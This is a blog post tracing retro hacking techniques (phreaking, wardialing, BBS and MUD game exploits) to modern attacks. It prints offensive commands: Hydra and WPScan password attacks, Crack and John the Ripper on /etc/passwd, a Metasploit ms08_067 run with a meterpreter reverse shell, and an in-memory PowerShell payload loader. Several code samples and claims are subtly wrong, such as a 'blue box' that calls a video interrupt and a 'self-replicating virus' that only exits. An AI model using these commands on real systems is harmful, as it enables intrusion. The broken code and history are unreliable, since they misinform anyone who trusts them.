Digital Ghosts: How 80s Exploits Still Haunts the Cyber Underworld

Rain Ginsberg
13 min readSep 7, 2024

--

Remember the sound of a dial-up modem connecting, or the excitement of discovering a hidden menu on a payphone? Back in the early days of hacking, tools were simpler, resourcefulness was the key. Hackers didn’t have the sophisticated tools of today, but they found ways to manipulate the systems around them, from telephone networks to early personal computers, bending the rules and finding ingenious ways to exploit vulnerabilities. Despite being decades old, many of these techniques laid the groundwork for modern offensive security strategies.

While technology has advanced rapidly, many of the core concepts behind those first hacks remain alive. Techniques like phreaking, wardialing, and Bulletin Board Systems (BBS) may seem like relics, but they laid the foundation for today’s offensive security. Just as retro video games inspire modern titles, these early hacker methods have evolved, influencing today’s cybersecurity landscape.

In this post, we’ll explore the retro hacker’s toolkit — the old-school methods that shaped the hacking world — and show how these techniques continue to influence modern-day hacks. Understanding these early methods can give you an edge in today’s cybersecurity game.

Phreaking: Hacking the Phone System

Phreaking was one of the earliest forms of hacking, where hackers manipulated the phone system to make free long-distance calls by mimicking the frequencies used in telephone routing systems. The infamous blue box was a device that allowed hackers to emit a 2600Hz tone, which exploited a vulnerability in the signaling system of phone networks.

  • Modern Relevance: While phone phreaking might seem obsolete today, it was the precursor to modern-day network hacking. Techniques such as VoIP hacking and exploiting network communication protocols can trace their origins back to the same principles used by phreakers.
  • Lesson for Modern Hackers: Phreakers understood the importance of understanding the system before exploiting it — a lesson that’s still applicable today in offensive security. Whether it’s reverse-engineering malware or studying network protocols, the foundation remains the same.
Infamous Blue Box that was used by phreakers to hack into analog phone systems.

Old-School Example: Blue Box (2600 Hz)

Phreakers used blue boxes to exploit vulnerabilities in the analog phone systems. By generating a 2600 Hz tone, they could trick the system into giving free calls.

; 1980s-era blue box tone generation code in Assembly
MOV AH, 0x00 ; Clear the register
MOV AL, 0x1F ; 2600 Hz frequency
INT 0x10 ; BIOS interrupt to sound tone

This simple assembly code could be used on early systems to manipulate tones on phone lines. The blue box used similar techniques to generate frequencies.

Modern Equivalent: VoIP and SIP Exploits

In the modern era, hackers target VoIP systems through vulnerabilities in SIP (Session Initiation Protocol). Here’s an example of how a hacker might automate SIP fuzzing to find vulnerabilities in a VoIP system:

# SIP VoIP fuzzing with scapy
from scapy.all import *
sip_request = "INVITE sip:bob@voipserver.com SIP/2.0\r\n"
ip = IP(dst="voipserver.com")
udp = UDP(sport=5060, dport=5060)
packet = ip / udp / sip_request
# Send a malformed SIP request to test for vulnerabilities
send(packet)

Here, tools like Scapy can be used to craft malformed SIP requests to test for weaknesses in modern VoIP systems, exploiting similar principles to phreaking.

Wardialing: Searching for Weak Spots

Wardialing involved dialing thousands of phone numbers to find ones connected to a modem. This brute-force technique was used to discover vulnerable systems. Hackers would leave computers running for hours, hoping to infiltrate modems.

Software used to wardial.

Old-School Example: Wardialing in BASIC

This simple program demonstrates how hackers would dial random numbers in search of modems.

10 FOR I = 5550000 TO 5559999
20 PRINT "Dialing "; I
30 REM Simulated dialing process
40 NEXT I

War Dialing to Find BBS Access

Hackers also used wardialing to find vulnerable BBS systems. Tools like ToneLoc automatically scanned phone numbers, searching for modems that answered and provided access to BBS login screens.

toneloc /s 555–0000 /e 555–9999 /m 2400 /p ATDT

This command dials every number from 555–0000 to 555–9999, looking for modems that connected at 2400 baud.

GUI Utility made in Commodore to assist in phreaking

Modern Equivalent: Port Scanning with Nmap

  • Modern Evolution: Wardialing evolved into port scanning, a key technique used today in penetration testing to discover open ports on networks.
  • Modern port scanners like Nmap are direct descendants of wardialing. Scanning large swaths of IP addresses to locate potential entry points is a daily activity for both security professionals and cybercriminals alike.
# Scan for open ports on a target IP address
nmap -p 1–65535 192.168.1.1

Bulletin Board Systems (BBS): The Early Hacktivist Forums

Before Reddit and Twitter, there were Bulletin Board Systems (BBS), which served as the first online communities where hackers shared knowledge, traded software, and exchanged secrets. BBS became the birthplace of hacking subculture, a space where hackers learned social engineering, file sharing, and software exploitation.

For those unfamiliar, a BBS was a text-based system accessible via dial-up modem, offering a menu-driven interface where users could navigate through different options. Here’s an example of what a typical BBS menu might have looked like:

The Cave BBS

Hacking BBS Menu Systems

BBS menus were the core navigation system for users, which allowed them to interact with the system through a simple command-line interface, providing access to public message boards, private messaging, file downloads, and even chat with the system operator (SysOp). Hackers found several ways to exploit these menus for unauthorized access, hidden commands, or to bypass limitations.

CypherPunk BBS

Exploiting Weak Passwords and Login Systems

BBS systems often had weak security, with simple passwords and minimal access control, making brute-force attacks an attractive method for hackers. By writing simple scripts to automatically attempt different password combinations, hackers could gain access to administrator or SysOp privileges.

  • Example of Old-School Password Brute Force in BASIC:
10 INPUT "Enter target username: "; U$
20 FOR P = 1000 TO 9999
30 PRINT "Trying password: "; P
40 REM Simulating login with username U$ and password P
50 REM If password is correct, print success
60 IF PASSWORD_CORRECT THEN GOTO 100
70 NEXT P
100 PRINT "Password found: "; P

This brute-force attack would test a series of numerical passwords until the correct one was found, allowing hackers to gain unauthorized access to privileged features such as hidden SysOp menus.

Here’s an old-school Pascal example:

program BruteForce;
var password: string;
guess: string;
begin
password := 'secret';
guess := '';
repeat
guess := NextGuess(guess); {Function to generate next password guess}
until guess = password;
writeln('Password found: ', guess);
end.

Hackers would generate guesses until they matched the password.

In the 1990s, brute force attacks were less automated compared to today, but hackers still had powerful tools at their disposal. Crack and John the Ripper were popular password-cracking utilities that hackers would use to attack user passwords in MUDs and other BBS systems.

  • Example of Password Cracking with Crack (Early 90s):
# Running Crack to brute force Unix passwords
./Crack /etc/passwd

This tool would attempt to brute-force or dictionary attack the password file, common on Unix-based systems, to reveal user credentials. Hackers would then use these credentials to gain unauthorized access to games, admin features, or even hidden files.

  • Example with John the Ripper (1996):
# Brute force attack with John the Ripper
john --wordlist=/path/to/wordlist.txt /etc/passwd

Both Crack and John the Ripper relied heavily on dictionary-based attacks to crack weak passwords, which were common in many BBS systems of the time. Once hackers had the passwords, they could escalate privileges or exploit game mechanics.

Modern Equivalent: Password Cracking with Hydra

Today, tools like Hydra automate password attacks on network services, such as SSH.

hydra -l root -P /path/to/passwords.txt ssh://192.168.1.1

From BBS Password Brute Forcing to Forum Hacking

On early BBS systems, hackers would brute-force login credentials using tools like Crack to gain access to admin privileges or sensitive data.
Today, similar tactics are used on modern web forums or content management systems (CMS) like WordPress, phpBB, or vBulletin.

  • Modern Equivalent: WPScan (WordPress security scanner)
  • Tools like WPScan and Hydra are commonly used today to brute-force WordPress admin passwords, exploiting weak credentials much like Crack targeted weak Unix passwords in the 90s.
wpscan --url https://targetsite.com --passwords passwords.txt

This command uses WPScan to target a WordPress site, testing a list of potential passwords until the correct one is found.

  • BBS to Dark Web: Today’s dark web and IRC channels are spiritual successors to BBS. In hidden forums, modern hackers share exploits and communicate in secret, much like decades ago.
  • Modern Tools: Private communication channels such as Telegram, Discord, and dark web forums are the evolution of BBS, though the core concept of hacker communities sharing information remains the same.

Exploiting BBS Games: LoRD and MUD

In the early days of the internet, long before the age of MMOs and modern multiplayer games, there existed a network of Bulletin Board Systems (BBS). These text-based communities served as the first online meeting points, where users connected through dial-up modems to share files, engage in discussions, and, of course, play games. BBS games like Legend of the Red Dragon (LoRD), TradeWars 2002, and Multi-User Dungeons (MUDs) were some of the earliest forms of multiplayer entertainment. But just as these games drew in competitive players, they also attracted hackers looking to exploit vulnerabilities and gain an unfair advantage and manipulate in-game mechanics.

Text-based online role-playing video game, released in 1989 by Robinson Technologies.

Manipulating Game Variables

LoRD stored player information and game states in plaintext or minimally protected files on the BBS server. Hackers who had access to the BBS system could directly edit player data, allowing them to give themselves more hit points, gold, or experience.

  • Accessing the LoRD user files and modifying stats like HP or gold using simple hex editors or text-based editors. Since data was often stored in plaintext, a user could easily bump up their stats with minimal effort.
# Accessing player stats file in a BBS directory
cat /bbs/lord/players.dat | grep playername
# Modify the gold amount
sed -i 's/Gold=100/Gold=999999/' /bbs/lord/players.dat

By changing values in players.dat, hackers could increase their resources, making their character unbeatable.

Bypassing Turn Limits

LoRD typically limited players to a certain number of turns per day to prevent overplaying and maintain fairness. However, hackers found ways to reset their daily turns by manipulating session cookies or sending specific commands to the server that tricked it into believing the day had reset.

  • Using packet sniffers or low-level network commands, a hacker could intercept and replay specific packets that indicated the player had new turns. They would manipulate the “turns remaining” data or force a reset.
# Capture packet session and resend it
tcpdump -i eth0 port 1234 > capture.pcap
tcpreplay --loop=10 capture.pcap

This method allows hackers to effectively reset their daily limit and continue playing indefinitely.

Code Injection Through Inputs

Many BBS games like LoRD took user input and echoed it back to other users without proper sanitization. Hackers exploited this by injecting control characters or malicious code that would crash the system or give them an advantage in the game.

  • Using ANSI escape sequences, hackers could manipulate the terminal output and crash other users’ sessions or flood them with unwanted text.
# ANSI bomb in a message 
echo -e "\x1b[2J\x1b[HGame Over" > input_field
  • This injected ANSI bomb would clear the screen of any users who opened the message, disrupting their gameplay.

Exploiting MUD (Multi-User Dungeon)

MUDs, being multi-user online environments, were a prime target for early hackers. MUDs allowed for collaboration and competition within a shared game world, but their complex nature left room for exploitation.

MAJOR MUD, one of the first popular text-based multiplayer real-time virtual genre.

Accessing Hidden Commands and Developer Tools

Some MUDs left developer tools or debug commands active in production environments. Clever users could invoke hidden commands or guess the syntax needed to activate admin-level privileges.

  • Hackers would attempt to discover admin commands like @godmode, @teleport, or @grantitem by brute-forcing command prefixes or exploiting poorly protected admin accounts.
> @godmode 
You have entered god mode. You are now invincible.
  • Once activated, these commands allowed the hacker to control the game, grant themselves items, or teleport to secret areas.
Part of the MAJOR-MUD gameplay.

Memory Overflow Attacks

MUDs, being written in C or other early programming languages, often had vulnerabilities related to buffer overflows. Hackers could input excessively long commands or messages that overflowed memory buffers, either causing the game to crash or giving them the ability to execute arbitrary code.

  • Hackers would input an excessively long string into a command, forcing the game to overwrite the return pointer of a function and execute shell commands.
# Malicious input in MUD causing a buffer overflow 
./mud_client.exe -send 'A' * 5000
  • This would cause the MUD to either crash or execute unintended code.

Exploiting Reputation and Economy Systems

In MUDs, the in-game economy and reputation systems were critical to player interaction. Hackers found ways to duplicate items or exploit economy glitches to inflate their wealth, making themselves virtually unstoppable.

  • Item Duplication Exploit: A common exploit involved triggering an inventory swap or sale event where the same item could be sold multiple times, resulting in item duplication.
# Simulate item duplication by glitching the sale command 
for i in {1..100}; do
sell_item "Sword of Power"
done
  • This trick allowed players to duplicate powerful items or generate infinite in-game currency, disrupting the game’s economy.

Evolution of Exploits in Online Games:

The exploits in BBS games like LoRD and MUDs laid the groundwork for many of the same types of attacks we see in modern multiplayer games. Exploiting economy systems, bypassing rate limits, and using input injection are still relevant today.

Modern Parallels:

  • Item duplication glitches and gold farming in games like World of Warcraft are direct descendants of BBS-era exploits.
  • Rate-limiting bypass remains relevant in online games where hackers use bots to bypass turn limits or cooldowns.
  • Exploiting admin tools is still common in modern gaming platforms, especially when game developers fail to disable debugging tools in production environments.

From BBS Game Exploits to Modern Game Glitches

The item duplication glitches and buffer overflow attacks used in MUDs and Legend of the Red Dragon (LoRD) are still prevalent in modern online games. MMORPGs like World of Warcraft, Elder Scrolls Online, and RuneScape have all experienced economy exploits where players duplicate rare items or generate infinite currency.

  • Example: Modern MMORPG Exploits
  • In many MMORPGs, hackers exploit game mechanics by using packet manipulation tools like Wireshark to intercept and modify in-game network traffic. By sending crafted packets back to the server, hackers can fool the game into generating multiple copies of rare items.
# Packet capture with Wireshark for in-game network manipulation 
tshark -i eth0 -f "tcp port 4000" -w game.pcap
  • After analyzing the packets, hackers can modify and replay them to gain an unfair advantage in the game, similar to how early MUD hackers would manipulate game state files.

From BBS Message Exploits to XSS and SQL Injection

Early BBS systems allowed hackers to exploit message boards using control characters (like ANSI bombs) or poor input sanitization. Today, this technique has evolved into more complex web-based exploits, such as cross-site scripting (XSS) and SQL injection (SQLi) attacks, which target web applications and forums.

  • Example of Modern XSS Attack:
<script>alert('Hacked!');</script>
  • In a modern forum or web app, if input sanitization is poor, inserting a simple script tag could execute arbitrary JavaScript in a user’s browser. This mirrors how early hackers exploited message systems in BBS to disrupt user sessions or escalate privileges.

Modern Techniques Influenced by the Past

Buffer Overflows to Metasploit: Early hackers exploited buffer overflows, like the Morris Worm of 1988.

Original source code of Morris Worm.

Old-School Example: Simple Buffer Overflow in C

Buffer overflows were a popular way to exploit early programs, often written in C. Here’s a basic example that could be exploited:

#include <stdio.h>

void vulnerableFunction(char *str) {
char buffer[16];
strcpy(buffer, str); // Potentially overflowing buffer
}

int main() {
char largeString[256];
memset(largeString, 'A', 255); // Fill with 'A's to overflow
largeString[255] = '\0';
vulnerableFunction(largeString);
return 0;
}

An attacker could overflow the buffer and potentially take control of the program by overwriting memory.

Example buffer overflow on BBS:

10 INPUT "Enter your message: "; M$
20 REM Assume buffer for message is 20 characters
30 REM A hacker sends a 100-character message, overwriting memory
40 PRINT "Message saved: "; M$

If the buffer wasn’t properly secured, this could allow the attacker to overwrite critical parts of memory, potentially leading to a system crash or access escalation.

Modern Equivalent: Metasploit Framework

The Metasploit Framework automates much of the exploitation process, including buffer overflows. Here’s a modern example of exploiting a buffer overflow vulnerability:

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.101
exploit

This command uses a pre-built exploit in Metasploit to exploit a buffer overflow vulnerability in Windows SMB. The tool automates much of the exploitation, making it accessible even to less experienced attackers.

Metasploit Console

Today, tools like Metasploit automate such attacks, making the process accessible to attackers of varying skill levels.

Programming with Constraints: In the early days, hackers wrote highly efficient code due to hardware constraints. Fileless malware, which runs entirely in memory, continues this tradition of lean, efficient malware.

Old-School Example: Lean Assembly Code

Back then, hackers often wrote malware in assembly language due to constraints on memory and processing power. Here’s a tiny piece of self-replicating code (a virus):

start:
mov ah, 4Ch ; Exit program system call
int 21h ; Interrupt to DOS
jmp start ; Infinite loop (self-replicating behavior)

This assembly code is just a snippet but showcases how efficient early malware had to be.

Modern Equivalent: Fileless Malware in PowerShell

Today, malware is written to evade detection by being fileless, often running in memory via PowerShell. Here’s a modern example of such malware:

$payload = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Base64EncodedPayload")) 
iex $payload # Execute payload in memory

This PowerShell script decodes a Base64-encoded payload and executes it directly in memory, leaving no trace on disk.

Conclusion: The Evolution of Old-School Techniques

From phreaking to port scanning, buffer overflows to Metasploit, and manual brute-forcing to automated password crackers, many old-school hacking techniques have evolved into the sophisticated tools used by modern offensive security professionals. While the tools may be different, the core principles of hacking have remained the same — and understanding them is crucial for modern cybersecurity defense.

--

--

Rain Ginsberg
Rain Ginsberg

Written by Rain Ginsberg

Connoisseur of art and cybersecurity; exploring the intersection of visual aesthetics and technology with focus on malware and offensive security techniques.

No responses yet